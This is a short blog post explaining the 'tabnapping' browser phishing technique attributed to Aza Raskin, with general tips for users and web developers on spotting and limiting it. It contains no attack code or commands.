Tabnapping - The new security threat
While we strongly advocate the use of tricky passwords and secure, regularly updated browsers (IE6 users, we’re looking at you - and so are Microsoft!) to ensure a phish-free online existence, Webmonkey has lifted the lid on a new attack method that’s a little harder to catch - and prevent.
“Tabnapping,” as it has been labelled, is when an attacker changes a page that is open in a currently unviewed browser tab to a phishy impersonator site. And while that might sound easy enough to avoid, the big hook here is that the attack can actually look through your history to find sites that you regularly access. As explained by Webmonkey, “an attacker can hijack your page, detect that you frequently login to Citibank’s website and impersonate that site, complete with a message about automatically ending your session and asking you to login again.”
Before you sink into a pre-determined sea of woe though, there is a telling way to check if you are set to be the next tabnapped victim - the URL will be wrong. So if you tend to use multiple tabs in your online time, be sure to have a peek at the URL bar when you flick to a new tab, and maybe even reload the page if something seems a bit odd.
For web developers keen to minimise the risk of chance of this occurring to site visitors, tabnapping discoverer Aza Raskin has the following advice: “Every time you include a third-party script on your page, or a Flash widget, you leave yourself wide open for an evil doer to use your website as a staging ground for this kind of attack.”
If you want to see some tabnapping in action, check out Raskin’s post - after leaving it unattended for a few moments, it had reloaded the page with a Gmail login page. He’s only used an image of Gmail’s page for his demonstration but a real bad guy will be sure to reload with the real thing.
As Raskin states “it’s time for the browser to take a more active role in being your smart user agent”. So until super smart browsers are built to beat security issues like this, stay security savvy and check those URLs.
Podcast
- Sharkey Media Podcast #4
- Sharkey Media Podcast #3 - Live from LA
- Sharkey Media Podcast #2
- Sharkey Media Podcast #1
Blog
- Another type of farming on Facebook
- New Facebook tools for business (and personal use too)
- Android scams and the new Dell Streak
- Goodbye Google Wave, hello social searching
- Google changes even more and Android dominates
- Social battles and Google changes
- Ask and you shall be social
- Web hosting and SEO
